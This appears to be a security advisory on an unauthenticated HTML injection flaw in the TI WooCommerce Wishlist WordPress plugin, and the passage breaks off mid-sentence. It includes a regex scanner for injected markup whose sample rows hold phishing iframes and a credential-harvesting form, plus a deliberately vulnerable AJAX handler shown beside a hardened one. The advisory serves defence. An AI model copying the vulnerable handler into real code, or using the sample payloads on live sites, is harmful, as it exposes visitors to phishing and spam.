| Plugin Name | TI WooCommerce Wishlist |
|---|---|
| Type of Vulnerability | Content injection |
| CVE Number | CVE-2025-9207 |
| Urgency | Low |
| CVE Publish Date | 2025-12-13 |
| Source URL | CVE-2025-9207 |
Urgent Security Advisory: Unauthenticated HTML Injection in TI WooCommerce Wishlist (≤2.10.0) — What WordPress Site Owners Must Do Now
Author: Hong Kong Security Expert · Date: 2025-12-13
Summary: An unauthenticated HTML/content injection (CVE-2025-9207) affects TI WooCommerce Wishlist versions ≤ 2.10.0. The vulnerability allows an unauthenticated actor to inject arbitrary HTML into pages and posts. The vendor has released a patched version (2.11.0). Sites running vulnerable versions should update immediately and follow the detection & remediation steps below.
Overview
On 13 December 2025 a disclosure recorded an unauthenticated HTML/content injection in the TI WooCommerce Wishlist plugin affecting versions up to and including 2.10.0. The plugin author released version 2.11.0 to address the issue.
From a Hong Kong security practitioner's perspective, this vulnerability class is serious because it lets an unauthenticated actor inject HTML into content served from your legitimate domain. Although the reported CVSS score is moderate, the practical impacts (phishing content, SEO spam, client-side attacks) can quickly damage trust and commercial operations.
This advisory explains the risk, step‑by‑step mitigation, detection tips, and controls you should apply immediately.
What is an unauthenticated HTML (content) injection?
Content injection means an attacker can insert HTML (and sometimes JavaScript) into pages or posts that the site serves to visitors. “Unauthenticated” means the attacker does not need to log in — exploitation is possible from the public internet.
Potential consequences include:
- Phishing pages that harvest credentials or payment data.
- SEO spam injection that creates hidden pages, affiliate links, or malicious redirects.
- Drive‑by downloads or client‑side attacks via injected scripts or iframes.
- Search engine penalties, blacklisting, and long‑term reputational damage.
Because malicious content is served from the site’s legitimate domain, users are more likely to trust it — which increases the impact considerably.
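A defender-side check for the kinds of injected markup listed above (scripts and iframes, credential-harvesting forms, hidden spam links, redirects). This is an added example, not code from the advisory or from the plugin; it assumes you have exported stored content rows (for instance `post_content` and wishlist-related `meta_value` columns) into an array, and the sample rows are constructed.

```php
<?php
// Added example: flag stored content carrying the markup classes a content
// injection typically leaves behind. Run it over exported post_content /
// postmeta values; the sample rows below are constructed, not real data.

function find_injected_markup(string $html): array {
    $findings = [];
    // Each label maps to a pattern for one class of risky markup.
    $checks = [
        'script_or_iframe' => '/<\s*(script|iframe|object|embed)\b/i',
        'credential_form'  => '/<\s*form\b[^>]*>.*?<\s*input\b[^>]*type\s*=\s*["\']?(password|email)/is',
        'hidden_element'   => '/style\s*=\s*["\'][^"\']*(display\s*:\s*none|visibility\s*:\s*hidden|left\s*:\s*-\d{3,}px)/i',
        'meta_refresh'     => '/<\s*meta\b[^>]*http-equiv\s*=\s*["\']?refresh/i',
        'event_handler'    => '/\bon(load|error|click|mouseover)\s*=/i',
        'js_url'           => '/(href|src)\s*=\s*["\']?\s*javascript:/i',
    ];
    foreach ($checks as $label => $pattern) {
        if (preg_match($pattern, $html) === 1) {
            $findings[] = $label;
        }
    }
    return $findings;
}

// Returns only the rows that triggered at least one check, keyed by row id.
function scan_rows(array $rows): array {
    $report = [];
    foreach ($rows as $id => $content) {
        $hits = find_injected_markup($content);
        if ($hits !== []) {
            $report[$id] = $hits;
        }
    }
    return $report;
}

// Constructed sample rows standing in for wp_posts.post_content and
// wp_postmeta.meta_value (domains use the reserved .invalid TLD).
$sample_rows = [
    'post:101' => '<p>Birthday list: red scarf, blue mug</p>',
    'post:102' => '<p>Gift ideas</p><div style="display:none"><a href="https://spam.invalid/">cheap pills</a></div>',
    'meta:7'   => 'Great product<iframe src="https://phish.invalid/login"></iframe>',
    'meta:9'   => '<form action="https://phish.invalid/collect"><input type="email"><input type="password"></form>',
    'meta:12'  => 'Plain note with no markup at all',
];

foreach (scan_rows($sample_rows) as $id => $hits) {
    echo $id, ': ', implode(', ', $hits), PHP_EOL;
}
```

The patterns are deliberately broad; a clean site should produce no hits on wishlist notes, so any flagged row is worth a manual look rather than automatic deletion. Because the point of a stored injection is that it survives in the database, scan the database rows themselves rather than a cached or CDN-served copy of the page.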
Vulnerability summary: TI WooCommerce Wishlist (≤2.10.0)
- Software: TI WooCommerce Wishlist (WordPress plugin)
- Affected versions: ≤ 2.10.0
- Fixed in: 2.11.0
- Type: Unauthenticated HTML / Content Injection
- Attack vector: HTTP (unauthenticated)
- CVE: CVE-2025-9207
- Disclosure date: 13 Dec 2025
In short: an unauthenticated actor can submit crafted requests that result in HTML being stored or displayed within site content or pages, enabling content manipulation without valid credentials.
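To make the "stored, then displayed" pattern concrete, here is a hypothetical WordPress AJAX handler for a wishlist note in its defective form beside a hardened form. This is an added illustration of the vulnerability class, not the plugin's own code, and it assumes a WordPress runtime; the hook names (`save_wishlist_note`), the meta key (`wishlist_note`), the nonce action and the request parameters are all assumptions.

```php
<?php
// Added example (hypothetical, not the plugin's code): a public AJAX handler that
// stores a wishlist note and later renders it. The first version shows the defect
// class the advisory describes; the second is the hardened form.

/* --- Vulnerable pattern: raw input stored, raw output echoed --------------- */
function vulnerable_save_note() {
    $post_id = (int) $_POST['post_id'];
    // Anonymous caller; the note is saved with no sanitization at all.
    update_post_meta($post_id, 'wishlist_note', $_POST['note']);
    wp_send_json_success();
}
add_action('wp_ajax_nopriv_save_wishlist_note', 'vulnerable_save_note');
add_action('wp_ajax_save_wishlist_note', 'vulnerable_save_note');

function vulnerable_render_note($post_id) {
    // Whatever was stored is emitted verbatim into the page: any HTML survives.
    echo '<div class="wishlist-note">' . get_post_meta($post_id, 'wishlist_note', true) . '</div>';
}

/* --- Hardened pattern ----------------------------------------------------- */
function hardened_save_note() {
    // 1. CSRF token bound to this action (the form emits it with wp_create_nonce).
    check_ajax_referer('wishlist_note', 'nonce');

    // 2. Authorization: only a user who may edit the target object may write to it.
    $post_id = isset($_POST['post_id']) ? absint($_POST['post_id']) : 0;
    if ($post_id === 0 || !current_user_can('edit_post', $post_id)) {
        wp_send_json_error('forbidden', 403);
    }

    // 3. Sanitize on input: sanitize_text_field strips tags, control characters
    //    and surrounding whitespace; a length cap limits spam payloads.
    $note = isset($_POST['note']) ? sanitize_text_field(wp_unslash($_POST['note'])) : '';
    if (mb_strlen($note) > 500) {
        wp_send_json_error('note too long', 400);
    }

    update_post_meta($post_id, 'wishlist_note', $note);
    wp_send_json_success();
}
// No wp_ajax_nopriv_ hook here, so anonymous requests are rejected by WordPress.
// If guests genuinely need this feature, keep a nopriv hook but still apply
// steps 1, 3 and 4 and bind the wishlist to a per-guest token (assumption).
add_action('wp_ajax_save_wishlist_note', 'hardened_save_note');

function hardened_render_note($post_id) {
    // 4. Escape on output regardless of what is stored. If limited formatting is
    //    required, use wp_kses() with an explicit allowlist instead of esc_html().
    $note = get_post_meta($post_id, 'wishlist_note', true);
    echo '<div class="wishlist-note">' . esc_html($note) . '</div>';
}
```

Input sanitization and output escaping are separate controls: escaping at render time protects the page even if an older, unsanitized value is already in the database, which is exactly the situation a site that was exposed before updating will be in.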
Technical analysis — how an attacker can abuse this vulnerability
The following is a high‑level technical description to help defenders understand typical mechanics behind content injection issues:
- Input accepted without proper sanitization/escaping
The plugin exposes an endpoint or form parameter that accepts user-supplied text. Server-side code fails to sanitize or escape HTML, or uses functions that let tags through.
- Stored vs. reflected
This is a stored/content injection scenario — malicious content persists and is shown to any user visiting an affected page. Stored injections are more serious because they persist across caching and are indexed by search engines.
- Entry points
Wishlist features typically accept item titles, notes, descriptions, or custom text fields, and these are the common entry points. Attackers may target wishlist creation or publicly accessible AJAX endpoints.
- Escalation vectors
Injected content can include HTML that loads external resources, iframes, forms, or minimal JavaScript (depending on output context). Even without